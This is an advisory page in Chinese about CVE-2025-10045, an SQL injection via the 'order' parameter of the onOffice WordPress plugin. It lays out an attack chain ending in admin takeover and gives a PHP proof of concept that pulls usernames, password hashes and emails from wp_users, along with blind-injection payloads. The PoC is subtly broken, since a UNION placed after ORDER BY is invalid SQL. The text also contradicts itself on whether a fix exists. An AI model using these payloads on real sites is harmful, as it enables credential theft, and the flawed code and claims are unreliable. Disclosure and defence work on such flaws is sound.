CVE-2025-10045：onOffice WP插件SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-10045

漏洞类型

SQL注入

CVSS评分

4.9 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

onOffice for WP-Websites (WordPress插件)

漏洞概述

CVE-2025-10045是WordPress插件onOffice for WP-Websites中存在的一个SQL注入漏洞。该插件是一款用于在WordPress网站上集成onOffice房地产管理系统的工具，广泛应用于房地产中介和房产展示网站。该漏洞存在于插件的RecordManagerReadListViewEstate.php文件中，具体位于'order'参数的处理逻辑中。

根据Wordfence安全团队披露的信息，该漏洞影响插件的所有版本，最高至6.5.1版本（含）。由于插件在处理用户通过'order'参数提交的排序请求时，未对用户输入进行充分的转义处理，也未对现有SQL查询进行充分的预处理（如使用参数化查询或预编译语句），导致攻击者可以在原始SQL查询中追加额外的SQL语句。

该漏洞的CVSS 3.1评分为4.9分，属于中危级别。其利用条件要求攻击者必须拥有Editor级别及以上权限，因此攻击门槛相对较高。但一旦成功利用，攻击者可以通过注入的SQL查询从数据库中提取敏感信息，如用户凭据、个人信息、房产数据等。该漏洞不会影响数据的完整性和系统可用性，但其对机密性的威胁不容忽视。

技术细节

该SQL注入漏洞的根本原因在于插件在处理列表视图（ListView）中房产记录（Estate）的排序功能时，对'order'参数的处理不当。具体技术细节如下：

1. **漏洞位置**：插件文件 RecordManagerReadListViewEstate.php 中的列表视图读取管理器（RecordManagerReadListViewEstate）。当用户请求对房产列表进行排序时，该参数被直接拼接到SQL查询的ORDER BY子句中。

2. **注入原理**：由于'order'参数未经过适当的转义（如使用mysqli_real_escape_string）或预处理（如使用PDO的预编译语句），攻击者可以构造特殊的SQL片段，例如通过注入UNION SELECT语句或布尔盲注表达式来读取数据库中的任意数据。例如，攻击者可以提交类似 `ORDER BY (SELECT CASE WHEN (条件) THEN 1 ELSE 1/(SELECT 0) END)` 的payload进行盲注。

3. **利用条件**：攻击者需要拥有Editor级别或更高权限的WordPress账户（如管理员、编辑等），这意味着普通订阅者或访客无法直接利用此漏洞。但拥有Editor权限的用户通常可以管理网站内容，具备一定的信任级别。

4. **攻击影响**：成功利用后，攻击者可以通过注入的SQL查询提取数据库中的敏感信息，包括但不限于：WordPress用户表（wp_users）中的用户名和密码哈希、插件配置信息、客户数据等。由于漏洞仅影响机密性（C:H），不会导致数据篡改或服务中断。

5. **修复方式**：插件开发者已在更新版本中对'order'参数进行了适当的转义和预处理，使用参数化查询或白名单验证来防止SQL注入。

攻击链分析

STEP 1

步骤1：获取权限

攻击者首先需要获取目标WordPress网站的Editor级别或更高权限账户。可以通过社会工程学、密码爆破或利用其他漏洞获取编辑权限的账户。

STEP 2

步骤2：识别目标

确认目标网站安装了onOffice for WP-Websites插件，且版本低于或等于6.5.1。可以通过查看插件目录或页面源代码进行确认。

STEP 3

步骤3：定位注入点

登录WordPress后台，访问onOffice插件的房产列表视图功能，定位包含'order'参数的请求接口。

STEP 4

步骤4：构造Payload

构造SQL注入payload，通过UNION查询、布尔盲注或时间盲注等方式注入到'order'参数中。

STEP 5

步骤5：提取数据

通过注入的SQL查询从数据库中提取敏感信息，包括管理员密码哈希、用户邮箱、插件配置数据等。

STEP 6

步骤6：权限提升

利用获取的管理员密码哈希进行密码破解，获取管理员权限后进一步控制整个WordPress网站。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<?php
/**
 * CVE-2025-10045 PoC - SQL Injection via 'order' parameter
 * Target: onOffice for WP-Websites WordPress Plugin <= 6.5.1
 * Vulnerability: SQL Injection in RecordManagerReadListViewEstate.php
 *
 * Note: This PoC demonstrates the injection point via the 'order' parameter
 * used in the list view estate sorting functionality.
 */

// Example of vulnerable SQL query construction (simplified):
// $query = "SELECT * FROM wp_oo_plugin_records ORDER BY " . $_GET['order'];

// Malicious 'order' parameter payload for extracting data via UNION-based injection:
// Note: Requires Editor-level authentication to access the vulnerable endpoint.

$target_url = "https://target-wordpress-site.com/wp-admin/admin.php?page=onoffice";
$malicious_order = "1 UNION SELECT user_login, user_pass, user_email, 4, 5, 6, 7, 8, 9, 10, 11, 12 FROM wp_users-- -";

// cURL request with authentication cookies (Editor-level access required)
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url . "&order=" . urlencode($malicious_order));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIE, "wordpress_logged_in_xxxxx=EDITOR_SESSION_COOKIE");
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$response = curl_exec($ch);
curl_close($ch);

echo $response;

// Alternative: Time-based blind injection payload for the 'order' parameter:
// $malicious_order = "1 AND (SELECT SLEEP(5) FROM wp_users WHERE user_login='admin')-- -";

// Alternative: Boolean-based blind injection payload:
// $malicious_order = "1 AND (SELECT SUBSTRING(user_pass,1,1) FROM wp_users WHERE ID=1)='\$'";
?>

影响范围

onOffice for WP-Websites <= 6.5.1

防御指南

临时缓解措施

在等待官方修复版本发布期间，建议采取以下临时缓解措施：1）审查并限制拥有Editor级别权限的用户数量，确保只有可信用户拥有此权限；2）通过Web应用防火墙（WAF）规则阻止包含SQL注入特征的请求（如UNION SELECT、SLEEP、SUBSTRING等关键字的'order'参数）；3）监控数据库日志，检测异常的SQL查询模式；4）暂时禁用onOffice插件的列表视图排序功能（如果可行）；5）定期备份数据库，以便在遭受攻击后能够快速恢复。